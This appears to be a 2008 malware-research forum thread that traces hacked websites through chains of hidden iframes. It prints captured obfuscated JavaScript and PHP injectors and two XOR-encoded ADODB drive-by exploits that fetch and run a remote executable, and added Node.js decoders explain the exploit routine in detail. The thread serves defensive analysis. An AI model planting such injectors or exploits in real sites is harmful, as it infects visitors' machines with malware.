downie
PIRT Handler
 Joined: May 19, 2006 Posts: 3983
Posted: Mon Apr 14, 2008 3:35 am Post subject: Scholes for scandal |
hxxp://scholes-it.com/
first iframe is from
'hxxp://tapki.cn/1.html?'+Math.round(Math.random()*19680)+'f0c38680004'
and there are other lines of obfuscript, maybe all the same.
_________________
"For evil to triumph utterly, it is only necessary that good men do nothing."
philipp2
Trooper

 Joined: Apr 11, 2008 Posts: 22 Location: Germany
Posted: Mon Apr 14, 2008 2:16 pm Post subject: |
Hi downie,
I looked at those websites and found the following:
hxxp://bathroomrenovationsillawarra.com/
| Code: |
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%61%63%35%31%38%63%30%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6c%61%63%6f%6e%69%63%73%6f%66%74%77%61%72%65%2e%6f%72%67%2f%73%2f%69%6e%2e%63%67%69%3f%31%30%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%31%30%35%32%30%29%2b%27%37%32%36%66%66%30%62%5c%27%20%77%69%64%74%68%3d%36%31%34%20%68%65%69%67%68%74%3d%31%38%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
</script>
|
decodes to
| Code: |
window.status='Done';document.write('<iframe name=7ac518c0 src=\'http://laconicsoftware.org/s/in.cgi?10?'+Math.round(Math.random()*110520)+'726ff0b\' width=614 height=180 style=\'display: none\'></iframe>')
|
The visitor is then redirected from laconicsoftware.org to
hxxp://all1info.biz/gpack/index.php
which is a web exploit framework, I think (http://www.secgeeks.com/gpack.html).
#####
hxxp://razzledazzlem.com/
decoded javascript:
| Code: |
<iframe src=http://google-analyze.com/stat.php width=1 height=1 style="display:none"></iframe>
|
This looks innocent; the visitor is redirected from hxxp://google-analyze.com/stat.php to
hxxp://scaned.info/tds/in.cgi?2 and then to
hxxp://google.ru
#####
hxxp://themetropoliscorporation.com/
| Code: |
<?php
eval(gzinflate(base64_decode("nZJBboNADEWvghBSoFGpmWHcRARyg0hdV+1oCk6hJQENDgmLhquXRZdBirq09e3/vmXvGwgHpVmWYICFjjvM0apKtsCgRTXVWuXSwgCt4JiwkGn0nHgWSXbQxCewKgfSubA4SZAVyULn0EAhKE7dx9AMJrqco/XL+Wp4XONAZJZZVrFpLW/tmDlO5mAaTb6r1Rfb4RqdLz+865l29joSj/Sxljen5OqhjsInN/E6YGWhEkf81A2eJEM7oTGmd4ImXo0UHwVDqRvY6ymxGnC6QUziTyVJpR3bmo7+rF2QeIS9MFDrVpXQ6hwbWcB0iMUi2TfW98pJV8keDRxUD50gPKSQ3Gpv7kK6ObpcBjMcTpg6eWn9xhbzKV5v7XwLnHfH+8e7BAn1pvbdbeaGM1Shu9m6QfIL"))); ?>
|
decodes to
| Code: |
<?php if (@fopen('http://xepace.cn/11/1', 'r')){echo file_get_contents("http://xepace.cn/11/1");} ?>
|
hxxp://xepace.cn/11/1 includes only links to
xaknet.ru, xhost.su and dvweb.ru.
There is also something that looks like traffic counting:
| Code: |
<script>function vVtdYxbbdbx(vytabdYaadt){ return(parseInt(vytabdYaadt,16));}function vydbYtbatyt(vYYYYbbyadt){ var vxyaYtdYVba='';for(vYbtdbabbYa=0; vYbtdbabbYa<vYYYYbbyadt.length; vYbtdbabbYa+=2){vxyaYtdYVba+=(String.fromCharCode(vVtdYxbbdbx(vYYYYbbyadt.substr(vYbtdbabbYa,2))));}return vxyaYtdYVba;} document.write(vydbYtbatyt('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227961567962567879596122206E616D653D227959566261647964797822207372633D22687474703A2F2F7265646469692E6F72672F747261666669632F667430346E65772F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A31383133292B2759796256746461617961222077696474683D2232353922206865696768743D223722207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E'));</script>
|
decoded:
| Code: |
<SCRIPT>window.status='Done';document.write('<iframe id="yaVybVxyYa" name="yYVbadydyx" src="http://reddii.org/traffic/ft04new/index.php?'+Math.round(Math.random()*1813)+'YybVtdaaya" width="259" height="7" style="display: none;"></iframe>')</SCRIPT>
|
and another obfuscated JavaScript that might be really malicious:
| Code: |
<script type='text/javascript'>
<!--
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%65%63%35%33%36%31%66%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%31%35%30%34%29%2b%27%36%27%20%77%69%64%74%68%3d%36%39%36%20%68%65%69%67%68%74%3d%37%34%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
//-->
</script>
|
decoded:
| Code: |
<IFRAME name=ec5361f src='http://tapki.cn/1.html?'+Math.round(Math.random()*51504)+'6' width=696 height=74 style='display: none'></IFRAME>
|
This site hxxp://tapki.cn/1.html serves another iframe, loading
hxxp://tapki.cn/ds/iframe.php
which then redirects to
hxxp://www.panel911.com/traffic/in.cgi?TFService
and again redirects to
hxxp://call-att.com/check/versionl.php?t=669
here we find the following code:
| Code: |
<iframe name=iframe1 width=1 height=1></iframe>
<iframe name=iframe2 width=1 height=1></iframe>
<script>
var currentSite = 0;
var sites = new Array();
sites[1]='./n14041.htm';
sites[2]='./n14042.htm';
function hbefertgrvfds() {
gbfgbsfdb++;
if (gbfgbsfdb<6) document.getElementById( "iframe"+gbfgbsfdb ).src = sites[gbfgbsfdb];
}
if (document.location.href!='sdfgdfgsdf')
setInterval( "hbefertgrvfds()", 5000 );
else alert ('sfgsdfgsdfg');
document.getElementById( "iframe"+"1" ).src = './n14041.htm';
</script>
|
which I don't understand yet.
Same for the code in n14041.htm and n14042.htm.
Must be some malicious JavaScript 'in progress' :\
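As an added example for this thread (not code from any of the posts), here is a small Node.js script that peels the two document.write()-based iframe injectors decoded in the post above without ever executing them: the unescape() layer of the tapki.cn iframe and the parseInt(x,16)/fromCharCode layer of the reddii.org iframe. The two sample strings are copied verbatim from the post (rejoined onto one line); the names decodePercent, decodeHexPairs, peelUnescape, extractIframes and triageInjector are this example's own.

```javascript
// Added example for this thread (not code from the posts): peel the two
// document.write()-based iframe injectors decoded above without running them,
// then list the iframe sources they would write. Plain Node.js, no dependencies.

// Sample 1: the unescape() injector (tapki.cn), verbatim from the post with the
// percent string rejoined onto one line.
const TAPKI_SCRIPT =
  "<script type='text/javascript'>\n<!--\ndocument.writeln(unescape ('" +
  '%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%65%63%35%33%36%31%66%20%73%72%63%3d%27' +
  '%68%74%74%70%3a%2f%2f%74%61%70%6b%69%2e%63%6e%2f%31%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64' +
  '%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%31%35%30%34%29%2b%27%36%27%20%77%69%64%74%68%3d%36%39%36' +
  '%20%68%65%69%67%68%74%3d%37%34%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f' +
  '%49%46%52%41%4d%45%3e' +
  "') );\n//-->\n</script>";

// Sample 2: the hex literal handed to vydbYtbatyt() (reddii.org), verbatim from
// the post and rejoined. The page's decoder function is reimplemented below as
// decodeHexPairs(); REDDII_SCRIPT wraps the literal in the same call form, with
// the decoder definitions left out.
const REDDII_HEX =
  '3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65' +
  '202069643D227961567962567879596122206E616D653D227959566261647964797822207372633D22687474703A2F2F7265646469' +
  '692E6F72672F747261666669632F667430346E65772F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E' +
  '646F6D28292A31383133292B2759796256746461617961222077696474683D2232353922206865696768743D223722207374796C65' +
  '3D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E';
const REDDII_SCRIPT = "<script>document.write(vydbYtbatyt('" + REDDII_HEX + "'));</script>";

// Layer A: percent-encoding, what unescape() does for %XX sequences (no %uXXXX here).
function decodePercent(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Layer B: two hex digits per character, the scheme vydbYtbatyt() implements.
function decodeHexPairs(hex) {
  const clean = hex.replace(/[^0-9a-fA-F]/g, '');
  let out = '';
  for (let i = 0; i + 1 < clean.length; i += 2) out += String.fromCharCode(parseInt(clean.substr(i, 2), 16));
  return out;
}

// Find the literal handed to unescape(...) and decode it ourselves, instead of
// letting the page's eval()/document.writeln() do it.
function peelUnescape(script) {
  const m = script.match(/unescape\s*\(\s*(['"])([\s\S]*?)\1\s*\)/);
  return m ? decodePercent(m[2]) : null;
}

// Pull every <iframe ...> out of decoded markup. A src written as
// 'http://host/path?'+Math.round(Math.random()*N)+'tag' is a per-visit cache
// buster: the static prefix is what you block or hunt for; the random suffix is
// why two analysts never see the same URL.
function extractIframes(markup) {
  const found = [];
  const tag = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tag.exec(markup)) !== null) {
    const attrs = m[1];
    const src = attrs.match(/src=\\?["']?(https?:\/\/[^\s"'\\]+)/i);
    found.push({
      src: src ? src[1] : null,
      randomized: /Math\.random\(\)/.test(attrs),
      hidden: /display:\s*none/i.test(attrs),
    });
  }
  return found;
}

// Decode whichever layer a script uses and report the iframes it would write.
function triageInjector(script) {
  let decoded = peelUnescape(script);
  if (decoded === null) {
    // hex-pair scheme: the payload is the long hex literal passed to the decoder
    const hex = script.match(/(['"])([0-9A-Fa-f\s]{40,})\1/);
    decoded = hex ? decodeHexPairs(hex[2]) : script;
  }
  return { decoded, iframes: extractIframes(decoded) };
}

for (const s of [TAPKI_SCRIPT, REDDII_SCRIPT]) console.log(triageInjector(s).iframes);
```

Two things the decoded output makes visible: in sample 1 the `'+Math.round(...)+'` sits inside the unescape() literal, so document.writeln emits it as literal text, while in sample 2 the decoded text is itself a <SCRIPT> whose own document.write concatenates a real random number. In both cases the host and path prefix is the stable indicator; the query string changes on every load.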
downie
PIRT Handler
 Joined: May 19, 2006 Posts: 3983
Posted: Mon Apr 14, 2008 7:29 pm Post subject: |
Actually for hxxp://google-analyze.com/stat.php
(which isn't registered to Google of course)
I get (spoofing the headers appropriately)
| Code: | Location: http://scaned.info/tds/in.cgi?2
Location: http://google-analystic.com/in.cgi?13
<frameset rows="100%"><frame src="http://google-analystic.com/t.php"></frameset>
...
iframe src=http://trafagon.cn/gb/ width=1 height=1 style="display:none"></iframe>
<iframe src=http://tr.sforge.info/ts/in.cgi?notfound width=1 height=1 style="display:none"></iframe>
|
hxxp://trafagon.cn/gb/
then serves up
| Code: | | <html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"><script language=JavaScript>str = "ru`su)(:gtobuhno!ru`su)(!zw`s!v`r!<!enbtldou/bsd`udDmdldou)&nckdbu&(:v`r/rdu@uushctud)&he&-&v`r&(:v`r/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(:usx!zw`s!p!<!v`r/Bsd`udNckdbu)&lr&*#yl#*&m3&*#/#*&YL&*#MI#*&U&*&UQ&-&&(:w`s!r!<!v`r/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&&(:w`s!u!<!v`r/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(:usx!z!u/uxqd!<!0:p/nqdo)&F&*#D#*&U&-&iuuq;..us`g`fno/bo.fc.mn`e/qiq&-g`mrd(:p/rdoe)(:!u/nqdo)(:u/Vshud)p/sdrqnordCnex(:w`s!o`ld!<!&/..//..hdyqHnsd/dyd&:u/R`wdUnGhmd)o`ld-3(:u/Bmnrd)(:|!b`ubi)d(!z|usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z||b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></head></html> |
an obfuscated Adodb exploit;
and hxxp://tr.sforge.info/ts/in.cgi?notfound
produces
| Code: | Location: http://208.72.168.176/e_notf_12/index.php
...
<html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"><script language=JavaScript>str = "ru`su)(:gtobuhno!ru`su)(!zw`s!fff!<!enbtldou/bsd`udDmdldou)&nckdbu&(:fff/rdu@uushctud)&he&-&fff&(:fff/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(:usx!zw`s!p!<!fff/Bsd`udNckdbu)&lr&*#yl#*&m3&*#/#*&YL&*#MI#*&U&*&UQ&-&&(:w`s!r!<!fff/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#no#-&&(:w`s!u!<!fff/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(:usx!z!u/uxqd!<!0:p/nqdo)&F&*#D#*&U&-&iuuq;..319/63/079/067.d^onug^03.mn`e/qiq&-g`mrd(:p/rdoe)(:!u/nqdo)(:u/Vshud)p/sdrqnordCnex(:w`s!o`ld!<!&/..//..hdyqmnsds/dyd&:u/R`wdUnGhmd)o`ld-3(:u/Bmnrd)(:|!b`ubi)d(!z|usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z||b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script><script type="text/javascript">if(window.location.hostname.search("spyshredder") < 0 && window.location.hostname.search("virtualpayr") < 0){location.replace("http://scanner.spyshredderscanner.com/14/?advid=4198&ref=2");}</script></head></html> "0">
<TR><TD CLASS=resultHeader ALIGN="CENTER" height=20>Result is not available</TD></TR>
</TABLE>
</BODY>
</HTML>
0
|
Adodb again.
Several of those URLs use IP logging, so if you don't get the code first time you need a proxy or renew your DHCP.
_________________
"For evil to triumph utterly, it is only necessary that good men do nothing."
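The `str` blobs in the two captures above are protected by a single-byte XOR (`charCodeAt(i) ^ 1`) and, underneath that, by splitting every indicator into `'cl'+'si'+"d:BD"+...` concatenations. As an added example that is not part of the post, the following Node.js code undoes both layers statically and pulls out the CLSID, the URL fetched and the dropped file name. SAMPLE is a shortened excerpt of the trafagon.cn `str` above (three fragments of the original joined, so the whole exploit body is not reproduced); the names xorDecode, foldStringConcat and triage are this example's own.

```javascript
// Added example for this thread (not code from the posts): undo the XOR-1
// obfuscation in the trafagon.cn / 208.72.168.176 pages captured above, fold the
// split string literals and pull out the indicators. Nothing is eval()'d.

// Constructed sample: a shortened excerpt of the `str` value from the trafagon.cn
// page (three fragments of the original, joined). Decoding shows the object
// creation, the classid assignment, the XMLHTTP open() and the drop file name.
const SAMPLE =
  'ru`su)(:gtobuhno!ru`su)(!zw`s!v`r!<!enbtldou/bsd`udDmdldou)&nckdbu&(:' +
  'v`r/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(:' +
  'p/nqdo)&F&*#D#*&U&-&iuuq;..us`g`fno/bo.fc.mn`e/qiq&-g`mrd(:' +
  'w`s!o`ld!<!&/..//..hdyqHnsd/dyd&:|';

// Layer 1: the page runs String.fromCharCode(str.charCodeAt(i) ^ 1) on every
// character, so applying the same XOR once more is the decoder.
function xorDecode(s, key = 1) {
  let out = '';
  for (let i = 0; i < s.length; i++) out += String.fromCharCode(s.charCodeAt(i) ^ key);
  return out;
}

// Layer 2: constant folding. The decoded script writes indicators as
// 'cl'+'si'+"d:BD"+"96C5"+... so that no single literal contains the CLSID.
// Joining adjacent literals until nothing changes puts them back together.
function foldStringConcat(js) {
  const pair = /(["'])([^"'\\]*)\1\s*\+\s*(["'])([^"'\\]*)\3/g;
  let prev;
  do {
    prev = js;
    js = js.replace(pair, (_, q1, a, q2, b) => "'" + a + b + "'");
  } while (js !== prev);
  return js;
}

// Layer 3: what an analyst wants out of the folded script: the COM object it
// instantiates, the URLs it contacts and the file it drops.
function triage(obfuscated) {
  const folded = foldStringConcat(xorDecode(obfuscated));
  const clsid = folded.match(/clsid:([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})/);
  const drop = folded.match(/var name = '([^']+)'/);
  return {
    folded,
    clsid: clsid ? clsid[1].toUpperCase() : null,
    urls: folded.match(/https?:\/\/[^'"\s]+/g) || [],
    dropFile: drop ? drop[1].split('/').pop() : null,
  };
}

console.log(triage(SAMPLE));
```

Run against the full `str` from either capture, the same three functions recover the complete routine: the CLSID BD96C556-65A3-11D0-983A-00C04FC29E36 is the RDS.DataSpace control, through which the script creates MSXML2.XMLHTTP, Shell.Application and ADODB.Stream, fetches load.php, writes the response to a file named to look like the browser binary (iexpIore.exe with a capital I in the first capture, iexplorer.exe in the second) and ShellExecutes it. That is the "Adodb exploit" the post refers to, and the reason the string-splitting exists is that a literal "ADODB.Stream" or the CLSID would be trivially signatured.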
philipp2
Trooper

 Joined: Apr 11, 2008 Posts: 22 Location: Germany
Posted: Mon Apr 14, 2008 8:10 pm Post subject: |
Yes, you are right, I overlooked that.
All those iframes and JavaScripts are confusing me.
I just noticed that this google-analyze.com host is actually not innocent at all, while looking at the website you posted here:
/t219663-Hard_cheese.html
Same thing, but getting the malware from hxxp://google-analyze.com/counter/load.php
and using this host as a C&C.